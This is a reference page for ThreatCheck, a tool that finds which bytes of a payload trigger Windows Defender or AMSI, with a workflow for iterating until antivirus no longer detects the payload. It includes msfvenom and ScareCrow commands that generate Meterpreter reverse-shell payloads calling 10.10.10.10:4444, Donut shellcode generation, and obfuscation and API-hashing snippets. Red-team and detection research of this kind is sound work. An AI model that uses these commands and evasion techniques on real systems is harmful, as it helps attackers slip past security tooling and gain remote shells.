ThreatCheck
ThreatCheck is a binary splitting utility that identifies specific byte ranges triggering antivirus and EDR detection through automated binary search against Windows Defender and AMSI. It dramatically accelerates payload evasion research by pinpointing exactly which portions of your shellcode or binary are flagged.
Installation
Section titled “Installation”Download the latest release from the ThreatCheck GitHub repository and build locally or use pre-compiled binaries.
| Step | Command |
|---|---|
| Clone repo | git clone https://github.com/rasta-mouse/ThreatCheck.git |
| Navigate to folder | cd ThreatCheck |
| Open solution | Open ThreatCheck.sln in Visual Studio |
| Build project | Build > Build Solution (Release x64 recommended) |
| Output location | bin\Release\ThreatCheck.exe |
Requirements:
- Windows 10/11
- .NET Framework 4.8 or higher
- Visual Studio 2019+ (for building from source)
- Administrator privileges (for AMSI scanning)
Alternatively, download pre-compiled binaries from GitHub releases page.
Quick Start
Section titled “Quick Start”# Scan a binary file with Windows Defender
ThreatCheck.exe -f payload.exe
# Scan with AMSI engine
ThreatCheck.exe -f payload.exe -e amsi
# Verbose output
ThreatCheck.exe -f payload.exe -vScan Engines
Section titled “Scan Engines”ThreatCheck supports multiple scanning engines to detect different signature types and evasion requirements.
| Engine | Option | Purpose | Use Case |
|---|---|---|---|
| Windows Defender | -e def or -e defender | Local AV signature scanning | Binary files, DLLs, executables |
| AMSI | -e amsi | PowerShell/CLR runtime detection | Scripts, .NET assemblies in-memory |
| Default | (none) | Uses Windows Defender | Quick scans for file-based payloads |
Engine selection:
- Use Defender (
def) for compiled binaries and shellcode files - Use AMSI (
amsi) for PowerShell scripts and .NET assemblies - Combine scans: run both engines to identify all detection vectors
File Scanning
Section titled “File Scanning”Scan binary or shellcode files to isolate flagged byte ranges using Windows Defender signatures.
# Basic file scan
ThreatCheck.exe -f C:\payloads\beacon.exe
# Scan with verbose output showing each iteration
ThreatCheck.exe -f C:\payloads\shell.bin -v
# Save output to file
ThreatCheck.exe -f payload.exe > results.txtBinary Splitting Process:
- ThreatCheck reads the entire payload file
- Splits it in half and tests each half against Defender
- If flagged, recursively splits the flagged half again
- Continues until isolated to the smallest detectable block
- Outputs hex offset and byte range of detection
Output Example:
[+] Scan starting...
[!] Detected at offset 0x1000 (4096 bytes)
[!] Detected in range: 0x1000 - 0x1200 (512 bytes)
[!] Detected in range: 0x1150 - 0x1180 (48 bytes)
[+] Smallest detection: bytes 0x1158-0x116F (24 bytes)The flagged byte range shows exactly which portion of your payload triggers detection.
AMSI Scanning
Section titled “AMSI Scanning”Scan PowerShell scripts and .NET assemblies against AMSI signatures for in-memory evasion analysis.
# AMSI scan of PowerShell script
ThreatCheck.exe -f script.ps1 -e amsi
# AMSI scan of .NET DLL
ThreatCheck.exe -f payload.dll -e amsi
# Verbose AMSI scan
ThreatCheck.exe -f beacon.cna -e amsi -vAMSI Scanning Considerations:
- Requires administrator privileges
- Tests against AMSI providers installed on the system (Windows Defender, third-party EDRs)
- More comprehensive than Defender-only scanning for EDR evasion
- Takes longer due to additional scanning layers
Output Interpretation
Section titled “Output Interpretation”Understanding ThreatCheck output helps you precisely modify payloads.
| Output | Meaning |
|---|---|
[+] Scan starting | Detection scan initiated |
[!] Detected at offset 0xXXXX | Flagged byte range found |
[+] Smallest detection | Final isolated byte range |
[+] Scan successful - No threats detected | Payload is clean |
Hex Dump Format:
0x00001000: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00
0x00001010: B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00Left column = memory offset, right = raw bytes. Cross-reference flagged offsets with your source binary to identify problematic code sections.
Workflow
Section titled “Workflow”The typical payload evasion workflow using ThreatCheck.
1. Generate initial payload (msfvenom, ScareCrow, Donut, etc.)
↓
2. Run ThreatCheck against payload
↓
3. Identify flagged byte range and source code
↓
4. Modify payload (obfuscate strings, rename functions, add junk)
↓
5. Regenerate payload with modifications
↓
6. Rescan with ThreatCheck
↓
7. Repeat until clean (no detection)Each iteration should focus on the specific flagged bytes identified by ThreatCheck rather than blindly obfuscating entire payloads.
Integration with Payload Tools
Section titled “Integration with Payload Tools”Use ThreatCheck output to guide modifications in popular payload generators.
ScareCrow Integration:
# Generate initial payload
.\ScareCrow.ps1 -Payload win/meterpreter/reverse_tcp -LHOST 10.10.10.10 -LPORT 4444 -O beacon
# Scan with ThreatCheck
ThreatCheck.exe -f beacon.exe
# Modify ScareCrow obfuscation settings and regenerate
.\ScareCrow.ps1 -Payload ... -ObfuscationLevel 4Donut Integration:
# Generate .NET shellcode
donut -a x64 -f myassembly.dll -o shellcode.bin
# Scan shellcode
ThreatCheck.exe -f shellcode.bin
# Modify Donut entropy or encapsulation, regenerate
donut -a x64 -f myassembly.dll -o shellcode2.bin -e entropymsfvenom Workflow:
# Generate payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw -o payload.bin
# Analyze
ThreatCheck.exe -f payload.bin
# Regenerate with encoder
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -e x64/xor_encoder -f raw -o payload_encoded.binCustom Scanning
Section titled “Custom Scanning”Extend ThreatCheck with custom YARA rules for organization-specific signatures.
# Note: Custom engine support varies by ThreatCheck version
# Some versions support YARA rule integration for advanced scanning
# Check available engines
ThreatCheck.exe -h
# Standard approach: use built-in Defender and AMSI engines
# For custom rules, compare output with your internal signaturesCommon Evasion Strategies
Section titled “Common Evasion Strategies”Targeted modifications based on ThreatCheck-identified flagged bytes.
| Strategy | Example | When to Use |
|---|---|---|
| String obfuscation | XOR encode signature strings | Flagged bytes contain command names |
| Function renaming | Rename Win32 API calls | Specific API sequence detected |
| Sleep injection | Add Sleep() calls | Sleep detection signature triggered |
| Junk code insertion | Add benign loops | Small flagged ranges need padding |
| Resource modification | Change icon/version | Resource section flagged |
| Encoder chains | Apply multiple encoders | Single encoding insufficient |
String Obfuscation Example: If ThreatCheck flags bytes containing “WinExec” or “CreateProcessA”, XOR encode these strings:
unsigned char encoded[] = {0x5F, 0x23, 0x1A, 0x45}; // obfuscated
// Decode at runtime to avoid static detectionFunction Renaming: If specific Win32 API sequences trigger detection, use indirect calls or API hashing:
FARPROC GetAPI = GetProcAddress(GetModuleHandle("kernel32"), "CreateProcessA");
// Call via pointer instead of direct importTroubleshooting
Section titled “Troubleshooting”| Issue | Solution |
|---|---|
| ”Access Denied” errors | Run as Administrator; check file permissions |
| Scan hangs on large file | File too large; test smaller sections first |
| ”Could not find part of the path” | Verify file path exists; use absolute paths |
| No detection reported (green) | Payload already clean; try in different AV context |
| Inconsistent results | EDR/AV engine state varies; disable other scanners |
| AMSI scan fails | Disable real-time protection temporarily; retry |
Debugging Steps:
# Test with known clean file
ThreatCheck.exe -f C:\Windows\notepad.exe
# Test with verbose output
ThreatCheck.exe -f payload.exe -v
# Verify .NET Framework version
Get-FrameworkVersion # Should show 4.8+
# Check Defender status
Get-MpPreferenceBest Practices
Section titled “Best Practices”- Iterate incrementally: Each modification should be minimal and tested
- Document flagged ranges: Keep notes of offset locations and modifications
- Test both engines: Run Defender and AMSI scans separately
- Use isolated test environment: Scan in isolated lab before deployment
- Combine techniques: Stacking multiple evasion strategies increases success rates
- Stay current: Antivirus signatures update frequently; rescan after intervals
- Understand false positives: Not all detections are true positives; validate in target environment
- Preserve functionality: Ensure obfuscation doesn’t break shellcode execution
Related Tools
Section titled “Related Tools”| Tool | Purpose |
|---|---|
| DefenderCheck | Alternative binary analysis against Defender; simpler output |
| AMSITrigger | Focused AMSI scanning and analysis; PowerShell-specific |
| AntiScan.me | Online multi-engine analysis; use cautiously (not air-gapped) |
| ScareCrow | Red team payload generator with obfuscation |
| Donut | Shellcode generation from .NET assemblies |
| msfvenom | Framework payload generator with encoding options |
| PE-Sieve | Memory scanning and hollow process analysis |
| Invoke-Obfuscation | PowerShell obfuscation framework |